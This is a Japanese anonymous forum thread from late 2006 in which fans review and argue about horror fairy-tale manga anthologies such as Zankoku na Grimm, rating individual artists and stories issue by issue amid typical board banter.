118 :花と名無しさん:2006/10/11(水) 03:12:11 ID:???0
いるかは今月の竹グリでカット描いてたけど、
残グリにはここしばらく出てないよね。

119 :花と名無しさん:2006/10/12(木) 02:49:50 ID:???0
しかもシン妻最終回ほっぽったままな。
最後まできちんとまとめろよ。気になるからさ。

120 :花と名無しさん:2006/10/12(木) 10:01:21 ID:???0
予告にあったのに、本が出たら落ちてたんだっけ?

121 :花と名無しさん:2006/10/12(木) 18:19:26 ID:???0
増刊号かなんかでパンを踏んだ娘が題材のマンガを読んだけど、大昔読んだ萩尾望都の同ネタマンガにデジャブってしまった。

122 :花と名無しさん:2006/10/12(木) 20:35:53 ID:???0
原作に忠実にアレンジしたら、そりゃ仕方ない。

123 :花と名無しさん:2006/10/13(金) 07:52:26 ID:???O
いるかよりも、小野さんが心配…

124 :花と名無しさん:2006/10/13(金) 09:07:17 ID:???0
小野さん、載らないねえ・゚・(ノД`)・゚・。

125 :花と名無しさん:2006/10/15(日) 03:29:28 ID:???0
>いるか=汗臭い

激しく納得。
エロイとか生々しいとはまた違うなあと思ってた。

それはそうとガポーン!!でちょっと鼻が楽しみになった自分がいるw

126 :花と名無しさん:2006/10/17(火) 00:49:52 ID:91bLWcAXO
スレッドタイトルにぶんか社以外のグリムのタイトルが入ってたから、そっちの話ししてもいいかしら? 実はぶんか社のは読んでません。創刊当時はかなり長い間読んでたんだけど。今は竹と笠倉読んでる。みなさんはぶんか社のみ?

127 :花と名無しさん:2006/10/17(火) 00:53:53 ID:???0
つ改行

128 :花と名無しさん:2006/10/17(火) 13:09:36 ID:???0
竹グリ読んでる。

129 :花と名無しさん:2006/10/18(水) 02:29:53 ID:???O
佐々木みすずのあの手ぬきっぷりはいかがなものか。
「甘美〜」で描いてる山本うららがエロくて素敵(^◇^)
団藤アイジは嫌いじゃないがなんで、いつからあんなにまつげ星人になってしまったんだ!?

130 :花と名無しさん:2006/10/18(水) 09:11:25 ID:???O
竹と残だけ。甘栗は波多野さんが載っている時だけ買ってる。
竹のたなはら好き。こんなところか。

131 :花と名無しさん:2006/10/18(水) 12:24:33 ID:???O
波多野さん、私も結構好き
今どこで描いてるのかな?
甘ぐりもサイズ大きくなってページもふえればなぁ

132 :花と名無しさん:2006/10/18(水) 21:25:01 ID:???0
たなはらと千乃が残グリにきて欲しい。
そう思いながら二人のだけ読んでる。

133 :花と名無しさん:2006/10/18(水) 21:39:56 ID:???0
たなはら、絵は綺麗だから、もう少しネームのメリハリ上手くなってほしい。

134 :花と名無しさん:2006/10/18(水) 23:40:53 ID:???0
>>133
わかる。
絵は確かに綺麗なんだけど、いまいち面白くない。
前よりはキャラの表情が豊かになってきたけど。

135 :花と名無しさん:2006/10/19(木) 15:41:22 ID:???0
 ぬるいのは、エロもグロもやりすぎるとギャグになっちゃうからだろ
うな。かといって普通のお話じゃホラーでもなんでもないし、さじ加減
が本当に難しそうだ。

136 :花と名無しさん:2006/10/19(木) 15:51:39 ID:???0
竹グリは毎号まつざきのカラーが見れるのでいい。

残グリ、いるかと小野マダァ-? (・∀・ )っ/凵⌒☆チンチン

137 :花と名無しさん:2006/10/19(木) 16:40:04 ID:???O
竹グリに前にディープラブの大パクパク漫画が載っててびっくりしたよ
ところで甘グリ語れる人はいないのぉ〜_(._.)_

138 :花と名無しさん:2006/10/19(木) 17:39:52 ID:???0
>>137
スレタイにあるように基本文科のスレだから
住人の寛容に甘えちゃいかんよ

139 :花と名無しさん:2006/10/19(木) 18:03:08 ID:???0
グリム系総合スレとか作れば、ぶんか意外ので語りたい人の需要ってある?
作ってもすぐ落ちそうな気もするけど。

140 :花と名無しさん:2006/10/19(木) 18:16:26 ID:???O
私は語りますよぉ(^-^)
でもまだ私は初心者なので自分でスレッド起てるのは止めておこうかと

141 :花と名無しさん:2006/10/19(木) 18:56:25 ID:???0
>>140
氏ね

142 :花と名無しさん:2006/10/19(木) 19:08:40 ID:???0
>>141
気持ちはわかるw

>>140
初心者だからと言って甘えたレスしてると、袋叩きにされても文句言えないよ。

と言いつつ、それでは他社スレ立ててみます。

143 :花と名無しさん:2006/10/19(木) 19:12:10 ID:???0
立てました。
竹グリ甘グリはこちらでどうぞ。

【グリム】おとぎ話漫画を語ろう1【昔話】
http://comic6.2ch.net/test/read.cgi/gcomic/1161252591/

144 :花と名無しさん:2006/10/19(木) 19:20:16 ID:???0
>>140
gat落ちしないようにちゃんと書き込めよ
>>143
超乙
DQN相手に・・おまいいい椰子だな

145 :花と名無しさん:2006/10/23(月) 16:18:00 ID:???0
>>144 gat w

146 :花と名無しさん:2006/10/23(月) 20:31:52 ID:???O
明日は本こわ発売日〜しかし、あのくそつまらん松苗は今回こっち
なんだな。

147 :花と名無しさん:2006/10/24(火) 16:34:52 ID:r5TQMvYg0
残繰り発売日っていつかわかるシトいる?
最近人気出てきたのか、すぐ売り切れてたまに買い損ねる。

148 :花と名無しさん:2006/10/24(火) 19:06:50 ID:???0
残繰りは29日じゃなかったかな。
総集編が10日前後だった希ガス

149 :花と名無しさん:2006/10/24(火) 22:45:17 ID:???0
本コワゲト。
特別ゲストのキンペだけ面白かった。さすが。
姉妹紙なのに歴然とした看板の差を感じました。
外から名前だけの作家を引っ張って優遇するのはいかがなものか。
浮きまくってるよ。

150 :花と名無しさん:2006/10/25(水) 02:51:28 ID:???0
華…orz

キンペはさすがなり。というか、ここしばらくの本誌のより、
出張の回の方がていねいで面白かった。
竹崎さん、実は疲れていたのか手を抜いていたのかとオモタ。

151 :花と名無しさん:2006/10/25(水) 23:53:39 ID:???0
本怖ゲト。さらっと流し。
アレキサンドライト…アゲハの後釜臭がプンプン。てかアゲハ打ち切り?
華…やっと服が花魁ぽい。
千匹皮…一川デムパ。
きんべ…鶏しめる雪ガカコイイヨ雪ガ。
松苗…いらん
安藤…これもいらん。


やっぱ二冊も出してると質が落ちるな。

152 :花と名無しさん:2006/10/27(金) 19:01:12 ID:???O
花田の、なにわシリーズの文庫でないかなー
絶対買うのに。

153 :花と名無しさん:2006/10/28(土) 22:35:19 ID:???0
文庫出る出ないの基準って、やっぱ人気のあるなしなんだろうか。
きんぺとるちか、かずはしはわかるが、
自分的に、全然おもしろくなかったアゲハがすぐ出るのがなんでなのかわからん。

154 :花と名無しさん:2006/10/29(日) 10:00:11 ID:???O
誰かテンプレ頼む…

155 :花と名無しさん:2006/10/29(日) 13:05:54 ID:???O
ほん怖がキンペ以外全滅だったせいか、残グリが凄く面白く感じられた。
あのモロオカまでも。

156 :花と名無しさん:2006/10/29(日) 14:25:24 ID:???0
わ、竹と甘のスレがもう落ちてる・・・
いずれ書こうと思ってたのに。

このごろ、通常コミックスが出ないでいきなり文庫版だな。
読めるならいいけど、どうも文庫本来の有難みがいまひとつ。
とにかく葉月さんのギリシア神話ものをまた出して欲しい。

157 :花と名無しさん:2006/10/29(日) 14:39:28 ID:???0
竹スレあるよ

158 :花と名無しさん:2006/10/29(日) 15:40:38 ID:???0
天ぷらあげたよー

残グリ2006年12月号

【表紙】魔木子:
【金瓶梅】竹崎:
【ホレおばさん】もろおか:
【恐ろしい偶然】藤田あ:
【本当にあった笑える話】桜木:
【月読】天ヶ江:
【ピエタ】北川:
【がちょう番の娘】抄堂:
【一枚の葉】空路:
【ねずの木】つか:
【オセロー】磯田:
【お見送りいたします】円山:
【首なしライダー】呪

159 :花と名無しさん:2006/10/29(日) 19:31:08 ID:???0
キンペの台詞に誤植なかった?

160 :花と名無しさん:2006/10/29(日) 21:09:43 ID:???0
竹スレあるけど書き込めない。

161 :花と名無しさん:2006/10/29(日) 23:04:17 ID:jKaVOeDO0
きんぺ
砒素のところ、ひそうってなってたよね。

162 :花と名無しさん:2006/10/29(日) 23:42:08 ID:T4N1VFJX0
金瓶梅
最初のカラーページの金蓮の顔がとっても変だよw
(「旦那様 いらしてくださいませ」のところ)
竹崎の書く顔は時々すごく歪んで見えたりするんだけど

163 :花と名無しさん:2006/10/30(月) 10:43:06 ID:???0
金瓶梅、今回で確信もてた。
フウ(漢字でてこない)は以前いたといわれる陳家の正室だね。


164 :花と名無しさん:2006/10/30(月) 11:24:40 ID:???0
>>161
砒素は砒霜(漢字あってるか自信なし)とも書いて
「ひそう」と読むんだよ。

>フウ(漢字でてこない)は以前いたといわれる陳家の正室
な、なんだってー!
つか、陳家って前も出て来たの?

165 :花と名無しさん:2006/10/30(月) 18:41:36 ID:???0
純粋なAsと、As2O3の漢字表記とふり仮名が混在したってことか。

166 :花と名無しさん:2006/10/30(月) 22:36:40 ID:???0
金蓮最終回近いんだね。
ヘイジ妊娠しそうだし。
作者は数年かきっつづけで気の毒だったけど、いざ
最終回が近くなり、終わるんだなあと思うと凄く寂しいなぁ。
作者さんへ:最終回を迎えたならゆっくりお休みください、昔からファンです。

話かわってつかのねずをみると、まだいるかがアシしてるね。
といっても随分長いアシみたいだけど。
木や背景小物のタッチがいるかだった。
いるかさんへ:m9(^Д^)プギャー!!

テンプレありがとう>>158ノシ随喜
残グリ2006年12月号

【表紙】魔木子: 特にこれといって。
【金瓶梅】竹崎: 佳境にはいってまいりました。
【ホレおばさん】もろおか: 講師先の生徒がアシなのか処理が若いのはいいけど
もろおか自身も意識して若い絵柄にしようしようとしてて気持ち悪い。
でも今回は布団のシーンが良かったのでまぁまぁ。
【恐ろしい偶然】藤田あ: ファンだけど、ひどい出来。言葉も無い。
【本当にあった笑える話】桜木: 一時ぶんか社雑誌のブームだったけど、秋田。
【月読】天ヶ江: タメになった。なるほど、人の名前だったのだなと。あとタイトルが作品にそってて良い。
【ピエタ】北川: コレ系のシリーズ2作目?面白いです。
【がちょう番の娘】抄堂: ぐへえ。
【一枚の葉】空路: ぶへぇ。
【ねずの木】つか: つかファンなのでひいきして、面白かった。ち、ちい姫ー!!
【オセロー】磯田: どへぇ。
【お見送りいたします】円山: きったない絵だけど、祖母祖父ネタに弱いので今回だけ良し。出来れば消えて欲しい。
【首なしライダー】呪 :ちょっとしたどんでんがえしが良かった。コミックスになるのが楽しみ。
文庫じゃなくてA5版にしてくれたらきっと売れる。


167 :花と名無しさん:2006/10/30(月) 23:58:48 ID:???0
>>166
三連続シリーズの最終回ってことじゃない?<キンベ

168 :花と名無しさん:2006/10/31(火) 00:17:42 ID:???0
>>167
だと思う。
キンペ無しで今の部数が保てないのは編集部もよくわかってるはず。

169 :花と名無しさん:2006/10/31(火) 07:18:06 ID:???O
抄堂のがちょう番、母親が瀕死の状態なのに、王も娘も王子も
のんきな顔で、もの凄い違和感を感じた。駄目だなこの人。
初めてほん怖で人喰いものみた時は、結構感動したのになあ。

170 :花と名無しさん:2006/10/31(火) 09:15:27 ID:???0
たまいまきこってこの間も初登場予告したのに、発売したら載らなかったよね?
二回連続で落としたのか…


171 :花と名無しさん:2006/10/31(火) 14:14:18 ID:???0
>>169
そこ同じこと思った。
母親やられてるのに王子ウィンクで登場って…
礼を言う時もまるで手紙届けてくれてありがうな感じだし表情へったくそすぎだと思った。
あのページ母親を手当てに連れて行かせる指示だけでもいれるとかすれば良かったのに。

エレミー鐘もこの人だっけな?あの時はここまでヘタとは思わなかった

172 :花と名無しさん:2006/10/31(火) 21:11:24 ID:???0
キンペ読みたくて先日アマゾンで初購入。
表紙デザ変えてくれたら本屋で買えるのに…
なんだ、この特集名と表紙は。
中身の意外なまっとーさに驚いたよ。

173 :花と名無しさん:2006/10/31(火) 22:47:27 ID:1Ryc+poT0
キンペのコミックいいですか?私もキンペ大好きっ子。残グリを読み出して3年ほど。
キンペはかなりの長期連載!? 今は楽しみで毎月買ってますが、買い出した頃は
気が向けばって感じでその時のストーリーが気になる2。連載年数に比べたらコミックは
4巻 やっぱ 寄りぬきか・・・。 残念。
武松 と出会った頃のストーリーもあるのでしょうか???
以前小学校1年の甥っ子が、側にあった残グリ見てて もろ丘さんやミルクさん
いる化さんの絵を見てしまって・・・。うわぁっ!!!  って。
以来 残グリを変な漫画 と 言っています。 
もう甥っ子の目の触れる場所には置いてないですが、変な本はないの?と見たいなぁってそぶりで
やっぱ男の子は裸好き??? でも まだ 早いよね。
同じ様な経験ありますか?


174 :花と名無しさん:2006/10/31(火) 22:52:16 ID:CId8puYl0
天麩羅借ありがd つ「砒素」(マテ>>158

残グリ2006年12月号

【表紙】魔木子: もっと濃い絵柄の人がいいなぁ。たとえばいru
【金瓶梅】竹崎: 竹崎の描く男ってセックルが薄そうに見えるのはどうしてだろう。
【ホレおばさん】もろおか: 髪飾りのデザイン変わってもいいんかい!
【恐ろしい偶然】藤田あ: 読む価値なし。
【本当にあった笑える話】桜木: スルー
【月読】天ヶ江: 面白かったけどもう少し別の切り口の方がよかった。
【ピエタ】北川: 芸術家シリーズ続くの?
【がちょう番の娘】抄堂: 母親放置でセックル。てかあぼん?
【一枚の葉】空路: ほぼ原典そのまんまじゃん…不可。
【ねずの木】つか: キチガイ描写唐突すぎ。
【オセロー】磯田: 面白かったけど原典のおかげかな。別作家で読みたい。
【お見送りいたします】円山: 言ってる事は正しいのだが何故か雲居野に共感できない。
                  そして別雑誌に逝けと何度(ry
【首なしライダー】呪 :イマイチ。


175 :花と名無しさん:2006/10/31(火) 22:52:58 ID:???0
ごめんageちゃった…

176 :花と名無しさん:2006/10/31(火) 23:00:14 ID:1Ryc+poT0
【表紙】魔木子: 良くも悪くも無く普通かな。
【金瓶梅】竹崎: へいじ 原作に合わせてこの話で妊娠!? 旦那様はほんま女好きやなぁ・・・。
【ホレおばさん】もろおか: いつものよりか絵はいいかな。
【恐ろしい偶然】藤田あ: ほんとうに怖い童話 と同じく 今回 雑過ぎる!
【本当にあった笑える話】桜木: 秋田 うちは笑えない。
【月読】天ヶ江: よかったですね。ヨネねぇ 少し怖かった。
【ピエタ】北川: ダヴィンチに続く2作目 よかった。シャーロッテもたま〜に見たい
【がちょう番の娘】抄堂: 実の母親に対して それは・・・。
【一枚の葉】空路: ストーリー そのままやん! 空路センセはもう少しひねったストーリできるのに残念
          物足りん!
【ねずの木】つか: ちぃ姫がっ!
【オセロー】磯田:三大悲劇の一つやけど今回初めてストーリー知りました。
【お見送りいたします】円山: ほん怖にお帰りください。お見送り致します
【首なしライダー】呪  今回も怖いな〜。


177 :花と名無しさん:2006/10/31(火) 23:02:42 ID:1Ryc+poT0
6周年記念の懸賞。 景品候補は 3回とも 残グリ 1年分 で送ります。
当たれば経済的やし、買いに行く手間も省けてありがたい。

178 :花と名無しさん:2006/10/31(火) 23:04:08 ID:l2abx9ud0
テンプレ作成感謝!

残グリ2006年12月号

【表紙】魔木子:普通に良い。でもあんまり内容と噛み合ってないような・・
【金瓶梅】竹崎:○ 最終回近いの?残念―・・・
【ホレおばさん】もろおか:△ ワロス
【恐ろしい偶然】藤田あ:読んでない
【本当にあった笑える話】桜木:× 逝って良し
【月読】天ヶ江:○ 感動・・カラー扉がとっても綺麗
【ピエタ】北川:読んでない
【がちょう番の娘】抄堂:読んでない
【一枚の葉】空路:△ う〜ん・・
【ねずの木】つか:△ 微妙。
【オセロー】磯田:△ 半分忘れた。
【お見送りいたします】円山:○ 良い感じ。この雑誌じゃ合わないけど・・・
【首なしライダー】呪:◎ 傑作!早くコミックになっとくれ。

たまいまきこは絵にも話にもセンスないから落とされても仕方ない。



179 :花と名無しさん:2006/10/31(火) 23:13:06 ID:1Ryc+poT0
176 です 。てんぷらのお礼を忘れてました。
ありがとうございました。

180 :花と名無しさん:2006/11/01(水) 05:03:38 ID:???0
>>179
sageて下さい

181 :花と名無しさん:2006/11/01(水) 10:15:19 ID:???0
>>171
ほぼ同意。

竹の主婦漫画で読んだときも、こないだのエレミー鐘もそう悪くなかったのに、
今回のは表情はさておき、ネームどうなってんのって感じ。

182 :花と名無しさん:2006/11/01(水) 17:28:35 ID:CbGNMbzx0
呪先生って残グリで都市伝説ものをずいぶん長く描いてるのに一冊もコミックスに
なってないのがありえん。ぶんか社は時々、最高の作家の才能を潰している。

183 :花と名無しさん:2006/11/01(水) 21:54:03 ID:???0
同意。
ネムキとかだったら、結構単行本出て売れたような希ガス。

184 :花と名無しさん:2006/11/02(木) 07:06:16 ID:cQ9+T/dq0
>>182
すっげー同意
もったいないよな

185 :花と名無しさん:2006/11/02(木) 08:21:01 ID:???0
あげてんの同じ人?自演にみえるよ。
さげろや。

186 :花と名無しさん:2006/11/02(木) 12:35:33 ID:bLPxWIaL0
>185
疑うのはかってだけどこっちは呪センセのことを書いてるだけ。
ぶんか社は確かに作家に見る目がない。

187 :花と名無しさん:2006/11/02(木) 13:30:39 ID:???0
>>186
それ以前に半年ロムったほうがいいよ

188 :花と名無しさん:2006/11/02(木) 14:49:17 ID:???0
呪さんは好きだけど、ぶんか社以外でどこで描ける?っていわれると首ひねるよ。
あの人根っからのホラー者だからね。売れる作品と、作品の出来は必ずしも合致しないというか。
ホラー誌が全滅状態の今、受け入れてくれるぶんか社に感謝こそすれ非難ってどうなのさ。
単行本は出て欲しいけどね。

上げ下げのことくらい調べてね。>186

189 :花と名無しさん:2006/11/02(木) 16:06:13 ID:bLPxWIaL0
たまいまきこはついに登場できないままか・・。

190 :花と名無しさん:2006/11/02(木) 16:17:29 ID:???0
>>189
sageろっていってんだろハゲ!
出来ないなら来るなヴォケ!!

191 :花と名無しさん:2006/11/02(木) 17:49:21 ID:???0
>>189
氏ね

192 :花と名無しさん:2006/11/02(木) 21:49:23 ID:???O
>>188
昔アワーズガールで見たことある。
描いてたのはやっぱりホラーだったな。
ペンネームからしてホラーしか描けないんじゃないかなぁ。と、いうより
ホラーしか描く気なし?
あと甘ぐりにも前載ってたよ。再録かもしれないけど

193 :花と名無しさん:2006/11/03(金) 01:03:27 ID:???O
甘栗話題ついでにレビュー

ファウスト◆千之…ベテランになにも言うことなし。
親指姫◆佐々木…相変わらずの手抜き。でもまだましなほう?
イバラ姫◆山本…とにかくエロ一色。好き嫌い別れるんだろうなぁ。私は好きだが。
カエルの王様◆緒川…可もなく不可もなく
赤ずきん◆ゑんどを…表紙は素敵だ。漫画はページが短いので評価できず
お夏清十郎◆永矢…諸岡飽きたよ。なんでこんなに登場させるの?
舞姫◆団藤…かなり絵のレベルは上がったけどあのまつげはどうにかならんかなぁ
武則天艶情◆岩本…絵汚すぎ。でも話しはおもしろかった
鶴の恩返し◆秋野…スルー
蝶々◆川島…特に印象残らず
今号から読者ページが始まったけど、それによると40代読者が多く、緒川が人気の模様。

194 :花と名無しさん:2006/11/03(金) 01:27:23 ID:???0
スレ違い
専スレでやって

195 :花と名無しさん:2006/11/03(金) 01:28:39 ID:???0
永矢さん、どこで描いてもワンパターンだよねえ(´・ω・`)
一時ほど、絵が無茶苦茶でなくなったのはいいけど。

196 :花と名無しさん:2006/11/03(金) 01:29:27 ID:???0
>>194
あ、ごめん、専スレはもう書き込み不可になってるし、1見てここでもいいのかと思った。

197 :花と名無しさん:2006/11/03(金) 01:35:15 ID:???0
せっかく立てて貰った専スレを、もう落としたのか('A`)
>>196は別として、無責任な椰子大杉


198 :花と名無しさん:2006/11/03(金) 01:44:16 ID:???0

             ____
      ∧_∧   /__ o、 |、   まあ、マターリとお茶でも ドゾー
     (´・ω・ )   .| ・ \ノ
     ( o旦o   | ・  |
     ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

199 :花と名無しさん:2006/11/03(金) 02:00:28 ID:???O
>>197
ごめんなさい(;_;)病に伏せっている間になくなってました

200 :花と名無しさん:2006/11/03(金) 15:27:37 ID:???0
>>199
最初の20〜30を過ぎるまでは即死基準があるから、
話題なくても保守レスを連投して、即死回避しておけばよかったんだお!

っと、問題のスレの雑誌は読んでないから行かない漏れがアドバイスしてみるw
これがdat落ち前の最後のレス。
↓↓
10 名前:花と名無しさん 投稿日:2006/10/23(月) 16:22:46 ID:???0

201 :花と名無しさん:2006/11/03(金) 16:18:48 ID:???0
(`・ω・´)立ててみるお

202 :花と名無しさん:2006/11/03(金) 16:26:01 ID:???0
甘グリ竹グリスレ、立てたお(* ^ω^)
今度は落ちないようにしてほしいお(´・ω・`)

【グリム】おとぎ話漫画を語ろう1【昔話】
http://comic6.2ch.net/test/read.cgi/gcomic/1162538464/l50

203 :花と名無しさん:2006/11/05(日) 08:44:34 ID:???0
ここの懸賞当たってwktkして待ってたら…
一目で偽とわかるブランド物でした…はずかしくて使えなかった

204 :花と名無しさん:2006/11/05(日) 15:39:23 ID:???O
ええーΣ(゚ロ゚;)ナニ-!!まじでっか?さっすがぶんか社Σ( ̄□ ̄;)

205 :花と名無しさん:2006/11/05(日) 20:49:17 ID:???0
それって普通に犯罪じゃ…

206 :花と名無しさん:2006/11/05(日) 21:04:21 ID:???0
>>203
そのまま警察にGO!懸賞ページと到着した時の梱包送付状とかもセットで。

207 :花と名無しさん:2006/11/05(日) 21:34:39 ID:???O
ぶんかしゃって、どうも会社全体に黒いものを感じるんですが…
私だけ?

208 :花と名無しさん:2006/11/05(日) 22:36:16 ID:???0
サヨの臭いがプンプンする。

209 :花と名無しさん:2006/11/05(日) 22:42:16 ID:???O
>>208
サヨって?

210 :花と名無しさん:2006/11/06(月) 00:10:21 ID:???0
まだ買えない

211 :花と名無しさん:2006/11/06(月) 20:09:10 ID:???0
イタァーーーーーーーーーーーーー!!!

212 :花と名無しさん:2006/11/07(火) 08:35:13 ID:???O
月読、あの描写はヨネねぇ絶対子供を殺すと思ったのに…
なんだあのハッピーエンド

213 :花と名無しさん:2006/11/07(火) 18:02:41 ID:???0
>>212
前号が殺伐してたからあれはあれでよかったと思う。
ルチカ最近面白い。絵もいい様に落ち着いてきた様に思う

214 :花と名無しさん:2006/11/07(火) 21:59:55 ID:???0
ようやく読んだので、遅ればせながら。テンプレ乙。

残グリ2006年12月号
【表紙】魔木子: 魔木子の絵は正直あまり好きじゃないからなあ。
【金瓶梅】竹崎: 次号で大戦争勃発か?相当話練ってると見た。期待。
外したら怒る。
【ホレおばさん】もろおか: デッサン狂いのエロを無理矢理ぶち込む
根性にある意味関心w  しかし乳首大好きだねこの人。
【恐ろしい偶然】藤田あ: 第二話は往年みごとな冴えを見せていた
陰鬱な人間のエゴの話にやや近い。なのに読みに集中せねば読み切らんほど
退屈なのは構成と絵の衰えのせいか。つくづく惜しいこの凋落は。
【本当にあった笑える話】桜木: 私も秋田。
【月読】天ヶ江: 天然のようで実はわざと不妊女をいたぶっていたトメの
性格が分かりづらく、話がまとまっていない、とっちらかった感じもするが、
考えてみればああいう人間描写の方がリアルなのかも。いい話。タイトル、
考えてみたら内容にピッタリだな!ホント!
【ピエタ】北川: どうにもあの絵は受けつけん‥‥
【がちょう番の娘】抄堂:自己マン姫の自己マンが潰れてくあたりは
面白かったが。
【一枚の葉】空路: まんまやね。まんまでどうする。
【ねずの木】つか: お館様が最後に気概見せたのが良かったかも。
【オセロー】磯田: つまんねえ‥‥
【お見送りいたします】円山: 読まんかった。なぜ入ってるグリに?
【首なしライダー】呪 :絵が受けつけず読んでない。評価高いから
これから読むかも。



215 :花と名無しさん:2006/11/07(火) 22:59:16 ID:???0
もろおかの「不思議な話しです」というモノローグにはワロタ。
お前の話はいつも不思議だし、体のつくりも動きも不思議だ。

216 :花と名無しさん:2006/11/07(火) 23:17:25 ID:???0
>>215
だまし絵のようだよなw
色々骨折や脱臼してるしww

217 :sage:2006/11/08(水) 10:07:11 ID:I9wafNjS0
諸事情により半年ぶりに残グリ購入。
天麩羅お借りします!
【表紙】魔木子: 表紙はいいんだが、この人の漫画がかなり好きじゃない。
【金瓶梅】竹崎: フウと正妻が戦ったらどっちが勝つかな?
【ホレおばさん】もろおか: イケメンに乳吸われてイケメン○○してあげた挙句幸せになれるんだったら
私もいくらでもするぜ
【恐ろしい偶然】藤田あ: ストーリーはいいんだが、絵に華がなくて不満足
【本当にあった笑える話】桜木: この人は自虐ネタの方が絶対面白いと思う
【月読】天ヶ江: やっぱりイイ!この人目当てで残グリ買ってる。オチが意外にもハッピーエンドなのもいい。
【ピエタ】北川: 結構好きな漫画家だが、今回の話はイマイチ。
【がちょう番の娘】抄堂:母が瀕死の時に男にときめくなよ・・・一気に冷めた。最初から冷めてたけど
【一枚の葉】空路:この人好きだけど、今回はちょっと・・。皆も言ってる通り、まんますぎ。
【ねずの木】つか:良かった。これぞつかクオリティー。ちい姫が可愛い。
【オセロー】磯田: これをいるかが描いていたらなあ・・・てかいるかどこ?半年ぶりの残グリなので浦島太郎状態。
【お見送りいたします】円山: 個人的に今月のワースト。まじで嫌だ。
【首なしライダー】呪 :これは予想もつかない展開。登場人物の名前が毎回よし子さんなのもイイ!



218 :花と名無しさん:2006/11/08(水) 10:08:33 ID:???0
本当にスマン、あげてしまった・・

219 :花と名無しさん:2006/11/08(水) 14:30:40 ID:???0
>>217
>登場人物の名前が毎回よし子さんなのもイイ!

気が付かなかったww

220 :花と名無しさん:2006/11/08(水) 15:03:36 ID:???0
>>174
>もっと濃い絵柄の人がいいなぁ。たとえばいru

涙のかわりに羊水が迸りそうだからイヤだ。

221 :花と名無しさん:2006/11/08(水) 15:43:18 ID:???0
>>219
ノシ
目から鱗w

222 :花と名無しさん:2006/11/09(木) 18:14:00 ID:???0
もろおか=ちくび星人決定。

ちくび黒いし。

223 :花と名無しさん:2006/11/09(木) 19:58:46 ID:???O
よし子さんワロタ
何気に男主人公だった時の名前をみたら、よしおさんだった。
呪やるのぉ。

224 :花と名無しさん:2006/11/09(木) 20:09:02 ID:???0
>>223
マジデスカwwwっw

225 :花と名無しさん:2006/11/10(金) 19:05:03 ID:???0
12月号のつか、表紙だけ見ればタローマルが狂ったみたいだ

226 :花と名無しさん:2006/11/10(金) 23:21:36 ID:???0
個人的に残グリの表紙で一度
白井、かずはし、などの少女漫画組みてみたい。
マキコ飽きた

227 :花と名無しさん:2006/11/10(金) 23:28:09 ID:???0
白井表紙、テラミタス…!

228 :花と名無しさん:2006/11/11(土) 22:14:15 ID:???0
キンベの今月号カラーみたいな表紙とか

229 :花と名無しさん:2006/11/11(土) 22:19:00 ID:???0
かずはしはカラー、下手じゃないか…?

230 :花と名無しさん:2006/11/11(土) 23:08:31 ID:???0
下手ってことはないと思うが、
さわやかすぎて残グリの表紙を飾るにはどぎつさというか、引きが足りない希ガス。
すっごく好きなんだけど。

231 :花と名無しさん:2006/11/11(土) 23:20:36 ID:???0
カラー下手なのは竹崎だと思うが。
配色センス微妙すぎ。

232 :花と名無しさん:2006/11/11(土) 23:27:22 ID:???0
悪いがかずはしはものすごく芸の無いCGカラーだと思う。
選択範囲をベタッと塗ってるだけで色合いもぼやーとしてて。
もうちょっと何とかならないのかな…。
漫画の画面も同じ印象。なんかこう効果とか画面がベタっとして奥行きや空気がない。
お話は面白いんだけど。
反対にお話は崩壊してるが、手塗りのカラーは岡田純子はめちゃ綺麗。
まつざき、松苗あたりも職人的な美しさ。
表紙はやっぱりカラーが美しくて派手な絵柄の人がいい。
マキコのカラーは色あいがいつも上手いなと感心するよ。派手な色を使わなくても華やかで。


233 :花と名無しさん:2006/11/12(日) 00:00:37 ID:???0
白井や岡田は色使いが綺麗だよね。
まつざきはゴージャス松苗は華麗。本当に職人芸の美しさ。
かずはしは確かに、平面的すぎる。漫画はいいけどね。

234 :花と名無しさん:2006/11/12(日) 01:59:04 ID:???0
>岡田純子はめちゃ綺麗。

古くさくて受け付けない
唇が最近厚くて嫌だ

235 :花と名無しさん:2006/11/13(月) 01:36:29 ID:2TAKAXxb0
ちばちばちばちばちばちばちば    ちばちばちばちばちばちば ちば ちば 
ちばちばちばちばちばちばちば    ちばちばちばちばちばちば  ちば ちば
ちばちば        ちばちば               ちばちば       
ちばちば        ちばちば               ちばちば       
ちばちば        ちばちば               ちばちば       
ちばちばちばちばちばちばちば    ちばちばちばちばちばちば       
ちばちばちばちばちばちばちば    ちばちばちばちばちばちば      

236 :花と名無しさん:2006/11/13(月) 16:21:28 ID:???0
かずはしは絵柄で損してると思う。
背景とか人物とか基本がすごくうまくて
作風もひろいのにさー、
あの絵が少女漫画し過ぎててどうも……

237 :花と名無しさん:2006/11/13(月) 20:42:42 ID:???O
だがそれがいい。

238 :花と名無しさん:2006/11/13(月) 22:56:11 ID:???0
そういえばかずはしのコミックス出てるけど
買った人いる?
全体的にどうでしょう

239 :花と名無しさん:2006/11/18(土) 07:36:27 ID:lFxPSby3O
>>238
全部買った。
個人的にはどれも外れ無し。
けど、童話のくくりがある残グリ文庫よりも
ホラーM文庫「いばら姫」のがかずはしの長所が出てて完成度高いと思う。


240 :花と名無しさん:2006/11/18(土) 09:18:41 ID:???0
ところで「波瀾万丈の女たち」を立ち読みした。
みるくの絵って動きが無くてロボットみたいだ。
ルチカは鼻がヘンなのが気になった。話暗すぎ。
モロ岡はまたこれでもかってぐらいにブルンブルンピチュクチュだった。

241 :花と名無しさん:2006/11/19(日) 11:19:43 ID:???0
ルチカはあの話の暗さが魅力でもあると思う。
それに暗い系だけではなく感動物を描かせたらピカイチだし。
みるくは本当に登場人物が死んでるよね・・・
絵は下手じゃないのに、絵で登場人物の感情を表現できないから
あまりいい漫画家とは思えない。

242 :花と名無しさん:2006/11/19(日) 22:16:32 ID:???O
坂東いるかさん(?)って 本出してるの?
この人の絵好きなんだけどな

243 :花と名無しさん:2006/11/19(日) 22:31:21 ID:???O
↑↑自己解決しました。すみません。

その今発売中の単行本の中に 津山人殺しを題材にした話は含まれていますか?

244 :花と名無しさん:2006/11/24(金) 11:13:36 ID:???0
今回は華じゃなくゲスト出演の千が人間離れw
灯篭ひっこぬいてハメハメってw

245 :花と名無しさん:2006/11/25(土) 17:50:04 ID:???0
鼻はやっぱりヴァカでした

246 :花と名無しさん:2006/11/26(日) 14:41:52 ID:???O
灯籠とヤるほど飢えてたのか。

247 :花と名無しさん:2006/11/26(日) 20:05:36 ID:???0
いつも華に対してのみこれでもかこれでもかと
